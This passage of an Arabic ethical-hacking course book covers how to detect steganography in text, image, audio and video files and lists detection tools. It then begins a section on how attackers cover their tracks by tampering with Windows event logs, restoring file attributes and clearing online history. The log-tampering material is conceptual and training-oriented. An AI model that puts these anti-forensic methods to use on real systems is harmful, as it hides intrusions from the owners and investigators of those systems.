‫ﺧﻼل ﺗﻌدﯾل اﻷﻟوان وﺑﻠوغ ﻣﺗوﺳط ﻗﯾم ﺑﻛﺳل‪ Sharpening .‬ھو اﻟﺗﺄﺛﯾر اﻟﻣﻌﺎﻛس ﻠ ‪ .blur‬ﻷﻧﮫ ﯾزﯾد اﻟﺗﺑﺎﯾن ﺑﯾن اﻟﺑﻛﺳﻼت اﻟﻣﺟﺎورة ﺣﯾث‬
‫ﯾوﺟد ﺗﺑﺎﯾن اﻻﻟوان اﻟﮭﺎﻣﺔ اﻟﺗﻲ ﻋﺎدة ﻣﺎ ﺗﻛون ﻋﻠﻰ ﺣﺎﻓﺔ اﻟﻛﺎﺋﻧﺎت‪ Rotation .‬ﯾﻘوم ﺑﺗﺣرﯾك ‪ stego-medium‬ﻟﯾﻌطﻲ ﻧﻘطﮫ وﺳطﮭﺎ‪.‬‬
‫‪ Resample‬ﯾﺷﻣل ﻣﺎ ﯾﻌرف ﺑﺎﺳم ﻋﻣﻠﯾﺔ اﻻﺳﺗﯾﻔﺎء )‪ (interpolation process‬اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﻠﺣد ﻣن ‪ raggedness‬اﻟﻣرﺗﺑطﺔ ﺒ‬
‫‪ .stego-medium‬ﯾﺳﺗﺧدم ﻋﺎدة ‪ Resample‬ﻟﺗﻐﯾﯾر ﺣﺟم اﻟﺻورة‪ Softening of the stego-medium .‬ﯾطﺑﻖ ‪uniform blur‬‬
‫إﻟﻰ اﻟﺻورة ﻟﺗﺟﺎﻧس اﻟﺣواف واﻟﺣد ﻣن اﻟﺗﺑﺎﯾن )‪ (Contrast‬وﺗﺳﺑب ﺗﺷوﯾﮫ أﻗل ﻣن ‪.blurring‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪479‬‬

‫‪Detecting Text and Image Steganography‬‬


‫‪ Steganography‬ھو ﻓن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ أو اﻟﺣﺳﺎﺳﺔ داﺧل ﻏطﺎء)‪ . (cover medium‬ﻓﻲ ھذا‪ ،‬ﺗﺳﺗﺧدم اﻟﺑﺗﺎت ﻏﯾر ﻣﺳﺗﺧدﻣﺔ‬
‫ﻟﻠﺑﯾﺎﻧﺎت ﻓﻲ ﻣﻠﻔﺎت اﻟﻛﻣﺑﯾوﺗر ﻣﺛل اﻟرﺳوﻣﺎت واﻟﺻور اﻟرﻗﻣﯾﺔ‪ ،‬واﻟﻧص‪ ،HTML ،‬اﻟﺦ‪ .‬ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن ﻏﯾر‬
‫اﻟﻣﺻرح ﺑﮫ‪ .‬اﻟﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﺗﺗم ﺑطرق ﻣﺧﺗﻠﻔﺔ اﻋﺗﻣﺎدا ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﻣﺳﺗﺧدﻣﺔ‪ .‬أﻧواع اﻟﻣﻠﻔﺎت اﻟﺗﺎﻟﯾﺔ ﺗﺗطﻠب أﺳﺎﻟﯾب ﻣﺣددة‬
‫ﻟﻠﻛﺷف ﻋن اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم إﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ ﻣﻠف ﺑﻣﺛل ھذه اﻟطرﯾﻘﺔ اﻟﺗﻲ ﻻ ﯾﻣﻛن أن ﯾﻛون ﻋﻠﻰ ﺑﯾﻧﮫ ﺑوﺟد ھذه اﻟرﺳﺎﻟﺔ إﻻ‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟذي ﯾﻣﻠﻛون ﺗﺻرﯾﺢ ﺑذﻟك ﺣﯾث ﯾﻣﻛﻧﮭم ﻗراءة اﻟرﺳﺎﻟﺔ ﺧﻔﯾﺔ أو اﺳﺗرداد اﻟرﺳﺎﻟﺔ‪ ،‬ورﺑﻣﺎ ﯾﺗم ﺗطﺑﯾﻖ ﺗﻐﯾﯾر ﻋﻠﻰ اﻟﻐطﺎء أو اﻟﻣﻠف‬
‫اﻟﻧﺎﻗل‪ .‬اﻟﺗﻐﯾﯾر ﯾﺧﺗﻠف ﺑﻧﺎء ﻋﻠﻰ ﻧوع اﻟﻣﻠﻔﺎت اﻟﻣﺳﺗﺧدﻣﺔ واﻟﻧﺎﻗل‪.‬‬
‫‪Text Files‬‬
‫ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ‪ ،‬ﯾﺗم إﺟراء ﺗﻌدﯾﻼت ﻋﻠﻰ ﻣوﺿﻊ اﻟﺣرف ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ .‬وﯾﻣﻛن اﻟﻛﺷف ﻋن ھذه اﻟﺗﻌدﯾﻼت ﻣن ﺧﻼل اﻟﺑﺣث ﻋن أﻧﻣﺎط‬
‫اﻟﻧص أو أي ﻣن اﻻﺿطراﺑﺎت‪ ،‬واﻟﻠﻐﺔ اﻟﻣﺳﺗﺧدﻣﺔ‪ ،‬ارﺗﻔﺎع اﻟﺧط‪ ،‬واﻟﻌدد اﻟﻐﯾر ﻋﺎدي ﻣن اﻟﻣﺳﺎﻓﺎت اﻟﻔﺎرﻏﺔ‪.‬‬
‫‪Image Files‬‬
‫ﯾﻣﻛن اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم إﺧﻔﺎﺋﮭﺎ ﻓﻲ اﻟﺻورة ﻋن طرﯾﻖ ﺗﺣدﯾد اﻟﺗﻐﯾﯾرات ﺳواء ﻓﻲ اﻟﺣﺟم وﺷﻛل ﻣﻠف‪ ،‬آﺧر ﺗﻌدﯾل‪ ،‬آﺧر ﺗﻌدﯾل‬
‫ﻟﻠطﺎﺑﻊ اﻟزﻣﻧﻲ‪ ،‬واﻟواح اﻷﻟوان ﻣن اﻟﻣﻠف‪.‬‬
‫أﺳﺎﻟﯾب اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻋﻧد ﻓﺣص اﻟﺻورة‪ .‬ﻋﻠﻰ اﻓﺗراض أن اﻟﺷﻲء اﻷﻗل أھﻣﯾﺔ ھو أﻛﺛر أو أﻗل ﻋﺷواﺋﯾﺔ ھو اﻓﺗراض‬
‫ﻏﯾر ﺻﺣﯾﺢ ﻣﻧذ ﺗطﺑﯾﻖ اﻟﻔﻠﺗرة واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ان ﺗظﮭران ‪ LSBs‬ﯾﻣﻛﻧﮫ إﻧﺗﺎج ﺻورة ﻣﻌﺗرف ﺑﮭﺎ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن اﺳﺗﻧﺗﺎج أن ‪LSBs‬‬
‫ﻟﯾﺳت ﻋﺷواﺋﯾﺔ‪ .‬ﺑدﻻ ﻣن ذﻟك‪ ،‬أﻧﮭﺎ ﺗﺗﻛون ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﺻورة ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫ﻛﻠﻣﺎ ﺗم إدراج رﺳﺎﻟﺔ ﺳرﯾﺔ إﻟﻰ ﺻورة‪ ،‬ﻟم ﯾﻌد ‪ LSBs‬ﺑﺷﻛل ﻋﺷواﺋﻲ‪ .‬ﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة اﻟﺗﻲ ﻟدﯾﮭﺎ ‪ entropy‬ﻋﺎﻟﯾﺔ‪ ،‬ﻓﺈن ‪ LSB‬اﻟﺧﺎص‬
‫ﺑﺎﻟﻐطﺎء ﻻ ﯾﺣﺗوي ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻋن اﻷﺻل‪ ،‬وھو أﻛﺛر أو أﻗل ﻋﺷواﺋﯾﺔ‪ .‬ﺑﺎﺳﺗﺧدام اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﻋﻠﻰ ‪ ،LSB‬ﻓﺎن اﻟﻔرق ﺑﯾن اﻟﻘﯾم‬
‫اﻟﻌﺷواﺋﯾﺔ واﻟﻘﯾم اﻟﺣﻘﯾﻘﯾﺔ ﯾﻣﻛن ﺗﺣدﯾدھﺎ‪.‬‬

‫‪Detecting Audio and Video Steganography‬‬


‫‪Audio File‬‬

‫ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ‪ ،‬اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟوﺛﺎﺋﻖ واﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻوت اﻟرﻗﻣﻲ‪ .‬ﯾﻣﻛن اﻟﻛﺷف ﻋن ھذه‬
‫اﻟوﺛﺎﺋﻖ اﻟﺗﻲ ﺗم إﺧﻔﺎﺋﮭﺎ ﺑﺎﺳﺗﺧدام اﻟطرق اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬طرﯾﻘﺔ اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ أن ﺗﺳﺗﺧدم ﻟﻣﻠﻔﺎت اﻟﺻوت ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﺗﻌدﯾﻼت ‪ LSB‬أﯾﺿﺎ ﻋﻠﻰ ﻣﻠف اﻟﺻوت‪.‬‬
‫‪ -‬اﻟﺗرددات ﻏﯾر ﻣﺳﻣوﻋﺔ ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت‪.‬‬
‫‪ -‬اﻟﺗﺷوھﺎت اﻟﻔردﯾﺔ واﻷﻧﻣﺎط ﺗظﮭر وﺟود ﺑﯾﺎﻧﺎت ﺳرﯾﺔ‪.‬‬
‫‪Video File -‬‬

‫ﻓﻲ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو‪ ،‬اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ أو أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ذات أي ﻧوع ﻣن اﻻﻣﺗدادات ﯾﺗم إﺧﻔﺎﺋﮫ ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﻗل إﻣﺎ‬
‫ﺑﺎﺳﺗﺧدام أدوات ‪ audio steganography‬أو ‪ .image steganography‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن اﻟﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﻔﯾدﯾو‬
‫ﯾﺗﺿﻣن ﻣﺟﻣوﻋﺔ ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺻورة واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ‪ .‬ﯾوﺟد اﻛواد ﺧﺎﺻﮫ وإﯾﻣﺎءات ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﺳرﯾﺔ‪.‬‬

‫‪Steganography Detection Tool: Gargoyle Investigator Forensic Pro‬‬


‫اﻟﻣﺻدر‪http://www.wetstonetech.com :‬‬
‫‪ Gargoyle Investigator Forensic Pro‬ھﻲ أداة ﺗﺟري ﻋﻣﻠﯾﺎت ﺑﺣث ﺳرﯾﻌﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﻌﯾن أو آﻻت ﻟﻠﺑﺣث ﻋن اﻟﺑراﻣﺞ‬
‫اﻟﺧﺑﯾﺛﺔ اﻟﻣﻌروﻓﺔ واﻟﻣﻣﻧوﻋﺎت‪ .‬ﻣن اﻟﻣﻣﻛن اﻟﻌﺛور ﻋﻠﻰ ﺑﻘﺎﯾﺎ ﺣﺗﻰ وﻟو ﺗﻣت إزاﻟﺔ اﻟﺑرﻧﺎﻣﺞ ﺣﯾث ان ﻋﻣﻠﯾﺔ اﻟﺑﺣث ﺗﺗم ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﻔردﯾﺔ‬
‫اﻟﻣرﺗﺑطﺔ ﺑﺑرﻧﺎﻣﺞ ﻣﻌﯾن‪ .‬ﯾﻣﻠك ﻣﺟﻣوﻋﺔ ﺗواﻗﯾﻊ )‪ (signature set‬ﺗﺣﺗوي ﻋﻠﻰ أﻛﺛر ﻣن ‪ 20‬ﻓﺋﺔ‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ‪،Trojans ،botnets‬‬
‫‪ Keyloggers ،encryption ،steganography‬وﻏﯾرھﺎ‪ ،‬وﯾﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن ﻣﻠﻔﺎت ‪ Stego‬اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺑﺎﺳﺗﺧدام‬
‫‪ ،S-Tools ،Weavwav ،Blindside‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ إﺟراء ﻓﺣص ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻗﺎﺋم ﺑذاﺗﮫ أو ﻣوارد ﺷﺑﻛﺔ ﻣن اﺟل‬
‫اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﻣﻌروﻓﺔ‪ ،‬وﻗدرة اﻟﻔﺣص داﺧل ﻣﻠﻔﺎت اﻷرﺷﯾف‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪480‬‬

‫‪Steganography Detection Tools‬‬


‫أدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﻛﺷف واﺳﺗﻌﺎدة اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ أي وﺳﺎﺋل اﻹﻋﻼم اﻟرﻗﻣﯾﺔ ﻣﺛل اﻟﺻور واﻟﺻوت‬
‫واﻟﻔﯾدﯾو‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﺔ ﺑﺄدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪:‬‬
‫‪Xstegsecret available at http://stegsecret.sourceforge.net‬‬
‫‪Stego Suite available at http://www.wetstonetech.com‬‬
‫‪StegAlyzerAS available at http://www.sarc-wv.com‬‬
‫‪StegAlyzerRTS available at http://www.sarc-wv.com‬‬
‫‪StegSpy available at http://www.spy-hunter.com‬‬
‫‪StegAlyzerSS available at http://www.sarc-wv.com‬‬
‫‪StegMark SDK available at http://www.datamark.com.sg‬‬
‫‪Steganography Studio available at http://sourceforge.net‬‬
‫‪Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net‬‬
‫‪Stegdetect available at http://www.outguess.org‬‬

‫‪COVERING TRACKS 5.7‬‬

‫ﺑﻣﺟرد ﻛﺳر اﻟﻣﮭﺎﺟم اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر ﺑﻧﺟﺎح‪ ،‬ﻓﺎﻧﮫ ﯾﺣﺎول إﺧﻔﺎء ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ أو ﺗﺗﺑﻌﮫ‪ .‬ﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم‬
‫ﻟﺗﻐطﯾﺔ ﺟﻣﯾﻊ اﻟﻣﺳﺎرات أو اﻟﺳﺟﻼت اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ أﺛﻧﺎء ﻣﻣﺎرﺳﺗﮫ أو ﻣﺣﺎوﻻت اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫ﻟﻤﺎذا ﻧﺤﺘﺎج اﻟﻰ ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات)‪ (Why Cover Tracks‬؟‬

‫اﻟوظﯾﻔﺔ اﻟﻛﺎﻣﻠﺔ ﻟﻠﻣﮭﺎﺟم ﯾﻧطوي ﻟﯾس ﻓﻘط ﻋﻠﻰ اﻟﻣﺳﺎس ﺑﺎﻟﻧظﺎم ﺑﻧﺟﺎح وﻟﻛن أﯾﺿﺎ ﺗﻌطﯾل اﻟﺗﺳﺟﯾل‪ ،‬وﺗطﮭﯾر ﻣﻠﻔﺎت اﻟﺳﺟل‪ ،‬واﻟﻘﺿﺎء ﻋﻠﻰ‬
‫اﻷدﻟﺔ‪ ،‬وزرع أدوات إﺿﺎﻓﯾﺔ‪ ،‬واﻟﺗﻲ ﺗﻐطﻲ اﻟﻣﺳﺎرات‪ .‬اﻟﻣﮭﺎﺟم ﯾﺟب ﻋﻠﯾﮫ ﻣﺳﺢ أي دﻟﯾل ﻋﻠﻰ وﺟوده‪ .‬ﻣﺣو ﺳﺟﻼت اﻟﺗﺳﻠل‪ ،‬وﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت‪،‬‬
‫وﻋﻣﻠﯾﺎت اﻟﮭﺟوم ھو أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻛﻣﺎ ﯾﻣﻛن ﻟﻠرﺳﺎﺋل ﺗﻧﺑﯾﮫ اﻟﻣﺎﻟك اﻟﻔﻌﻠﻲ ﻟﻠﻧظﺎم ﻟﺗﻐﯾﯾر إﻋدادات اﻷﻣﺎن ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻓﻲ‬
‫اﻟﻣﺳﺗﻘﺑل‪ .‬ﻓﺈذا ﺣدث ھذا‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﺳوف ﯾﺗرك ﺑﻌد ذﻟك ﻣﻊ ﻋدم وﺟود ﻓرص ﻟﻠوﻟوج اﻟﻰ اﻟﻧظﺎم ﻹطﻼق اﻟﮭﺟوم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم‬
‫ﯾﻘوم ﺑﺗدﻣﯾر اﻷدﻟﺔ ﻋﻠﻰ اﻟﺗدﺧل ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول واﻟﺗﮭرب‪ .‬إذا ﻏطﻲ اﻟﻣﮭﺎﺟم أو ﺣذف اﻟﻣﺳﺎرات‪ ،‬ﻓﺎﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ‬
‫اﻟﻧظﺎم واﻟﺗﺛﺑﯾت اﻟﺧﻔﻲ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣﺛل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور‬
‫ﻟﻠﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ‪ ،‬وﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪481‬‬

‫ﻗد ﻻ ﯾرﻏب اﻟﻣﮭﺎﺟم ﻓﻲ ﺣذف اﻟﺳﺟل ﻛﺎﻣل ﻟﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ﻷﻧﮭﺎ ﻗد ﺗﺗطﻠب اﻣﺗﯾﺎزات اﻟﻣدﯾر‪ .‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗﺎدرا ﻋﻠﻰ ﺣذف ﺳﺟﻼت‬
‫أﺣداث اﻟﮭﺟوم‪ ،‬ﺣﺗﻰ ذﻟك اﻟﺣﯾن ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺧﻔﻲ ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ‪.‬‬

‫اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ اﻟﺗﻼﻋب ﺑﻣﻠﻔﺎت اﻟﺳﺟل ﺑﻣﺳﺎﻋدة ﻣن اﻻﺗﻲ‪:‬‬


‫)‪ : SECEVENT.EVT (Security‬ﻓﺷل ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬واﻟوﺻول إﻟﻰ اﻟﻣﻠﻔﺎت دون اﻣﺗﯾﺎزات‪.‬‬
‫)‪ :SYSEVENT.EVT (system‬ﻓﺷل ‪ ،driver‬اﻷﺷﯾﺎء اﻟﺗﻲ ﻻ ﺗﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬
‫)‪:APPEVENT.EVT (applications‬‬

‫ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ‪COVERING TRACKS‬‬

‫ﻣﺣو اﻷدﻟﺔ ھو ﺷرط ﻷي ﻣﮭﺎﺟم اﻟذﯾن ﯾرﻏﺑون ﻓﻲ اﻟﺑﻘﺎء ﻏﺎﻣﺿﯾن‪ .‬ھذا اﻷﺳﻠوب واﺣد ﻟﺗﻔﺎدي اﻟﺗﺗﺑﻊ ﻣرة أﺧرى‪ .‬ﯾﺑدأ ھذا ﻣﻊ ﻣﺣو ﺗﺳﺟﯾﻼت‬
‫اﻟدﺧول اﻟﻣﻠوﺛﺔ ورﺳﺎﺋل اﻟﺧطﺄ اﻟﻣﺣﺗﻣﻠﺔ اﻟﺗﻲ رﺑﻣﺎ ﺗﻛون ﻗد وﻟدت ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺟوم‪ .‬اﻟﺗﺎﻟﻲ‪ ،‬ﺗﺷﻐﯾل اﻻﻧﺗﺑﺎه إﻟﻰ إﺣداث أﯾﺔ ﺗﻐﯾﯾرات ﺑﺣﯾث ﻻ‬
‫ﯾﺳﻣﺢ ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺳﺗﻘﺑﻠﻲ‪ .‬ﻋن طرﯾﻖ اﻟﺗﻼﻋب واﻟﺗﻐﯾﯾر واﻟﺗﺑدﯾل ﻓﻲ ﺳﺟﻼت اﻷﺣداث‪ ،‬ﯾﻣﻛن ﻟﻣﺳؤول اﻟﻧظﺎم أن ﯾﻛون ﻋﻠﻰ ﻗﻧﺎﻋﺔ ﺑﺄن‬
‫إﺧراج اﻟﻧظﺎم ﺻﺣﯾﺢ‪ ،‬وأﻧﮫ ﻻ ﯾوﺟد ﺗﺳرﯾب أو ﺣل وﺳط ﻗد اﺗﺧذت ﻓﻌﻼ‪.‬‬
‫إن أول ﺷﻲء ﯾﻘوم ﺑﮫ ﻣﺳؤول اﻟﻧظﺎم ﻟﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻏﯾر ﻋﺎدي ھو اﻟﺗﺣﻘﻖ ﻣن ﻣﻠﻔﺎت ﺳﺟل اﻟﻧظﺎم‪ ،‬ﻓﺈﻧﮫ ﻣن اﻟﺷﺎﺋﻊ ﻟﻠدﺧﻼء اﺳﺗﺧدام اﻷداة‬
‫اﻟﻣﺳﺎﻋدة ﻟﺗﻌدﯾل ﺳﺟﻼت اﻟﻧظﺎم‪ .‬ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت‪ rootkits ،‬ﯾﻣﻛﻧﮫ ﺗﻌطﯾل وﺗﺟﺎھل ﻛﺎﻓﺔ اﻟﺳﺟﻼت اﻟﻣوﺟودة‪ .‬ﯾﺣدث ھذا إذا ﻛﺎن اﻟﻣﺗﺳﻠﻠﯾن‬
‫ﯾﻧون اﺳﺗﺧدام اﻟﻧظﺎم ﻟﻔﺗرة أطول ﻣن اﻟزﻣن ﻛﻘﺎﻋدة اﻧطﻼق ﻟﻌﻣﻠﯾﺎت اﻻﻗﺗﺣﺎم ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪ ،‬إذا ﻛﺎﻧت إزاﻟﺔ ﺗﻠك اﻷﺟزاء ﻓﻘط ﻣن اﻟﺳﺟﻼت اﻟﺗﻲ‬
‫ﯾﻣﻛن أن ﺗﻛﺷف ﻋن وﺟود اﻟﮭﺟوم‪.‬‬
‫ﯾﺗﺣﺗم ﻋﻠﻰ اﻟﻣﮭﺎﺟﻣﯾن ﺟﻌل اﻟﻧظﺎم ﯾﺑدو وﻛﺄﻧﮫ ﻓﻌﻼ ﯾﺑدو ﻗﺑل أن ﯾﺗﻣﻛن ﻣن اﻟوﺻول ﻟﻠﻧظﺎم وﺗﺛﺑﯾت‪ Backdoor‬ﻻﺳﺗﺧداﻣﮭﺎ‪ .‬أي ﻣن اﻟﻣﻠﻔﺎت‬
‫اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﺗﺣﺗﺎج إﻟﻰ ﺗﻐﯾﯾره ﻣرة أﺧرى إﻟﻰ ﺻﻔﺎﺗﮫ اﻷﺻﻠﯾﺔ)‪ . (original attributes‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﺗﻐطﯾﺔ‬
‫اﻟﻣﺳﺎرات اﻟﻣﺗﻌﻠﻘﺔ ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ‪ .NT‬ﻗﺎﺋﻣﺔ اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻣﺛل ﺣﺟم اﻟﻣﻠف واﻟﺗﺎرﯾﺦ‪ ،‬ھو ﻣﺟرد ﻣﻌﻠوﻣﺎت وﺻﻔﯾﮫ )‪ (attribute‬ﺑداﺧل اﻟﻣﻠف‪.‬‬
‫اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻣﮭﺎﺟﻣﯾن اﻟذي ﯾﺣﺎول ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم ﻋن طرﯾﻖ ﺗﻐﯾﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﺗﺻﺑﺢ ﺻﻌﺑﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﻣﻛن اﻟﻛﺷف‬
‫ﻋﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗد ﻏﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﻋن طرﯾﻖ ﺣﺳﺎب ھﺎش اﻟﺗﺷﻔﯾر ﻋﻠﻰ اﻟﻣﻠف‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺎش ھو اﻟﺣﺳﺎب)‪(calculation‬‬
‫اﻟذي ﯾﺗم ﺿد اﻟﻣﻠف ﺑﺄﻛﻣﻠﮫ ﺛم ﺗﺷﻔﯾره‪.‬‬
‫طﺮق ﻣﺴﺢ اﻟﻤﺴﺎرات اون ﻻﯾﻦ )‪(Ways to Clear Online Tracks‬‬
‫اﻹﻧﺗرﻧت ھو اﻟﻣورد اﻟﻧﮭﺎﺋﻲ ﻟﻠﺑﺣث أو ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﺗﻌﻠﻖ ﺑﺄي ﻣوﺿوع‪ .‬ﻟﻸﺳف‪ ،‬ﯾﺳﺎء اﺳﺗﺧدام ﻣوارد اﻹﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﻟﺗﻌﻘب أﻧﺷطﺔ اﻵﺧرﯾن ﻋﺑر اﻹﻧﺗرﻧت‪ ،‬واﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭم ﺑﺷن اﻟﮭﺟﻣﺎت أو اﻟﺳرﻗﺔ‪.‬‬
‫ھﻧﺎك ﻋدة طرق ﻟﻣﺳﺢ اﻟﻣﺳﺎرات اون ﻻﯾن‪:‬‬
‫‪ -‬اﻟﺗﺻﻔﺢ اﻟﺧﺎص ‪Private browsing‬‬
‫‪ -‬اﻟﺗﺎرﯾﺦ ﻓﻲ ﺣﻘل اﻟﻌﻧوان ‪History in the address field‬‬
‫‪ -‬ﺗﻌطﯾل ﺗﺧزﯾن اﻟﺗﺎرﯾﺦ ‪Disable stored history‬‬
‫‪ -‬ﺣذف اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ‪Delete private data‬‬
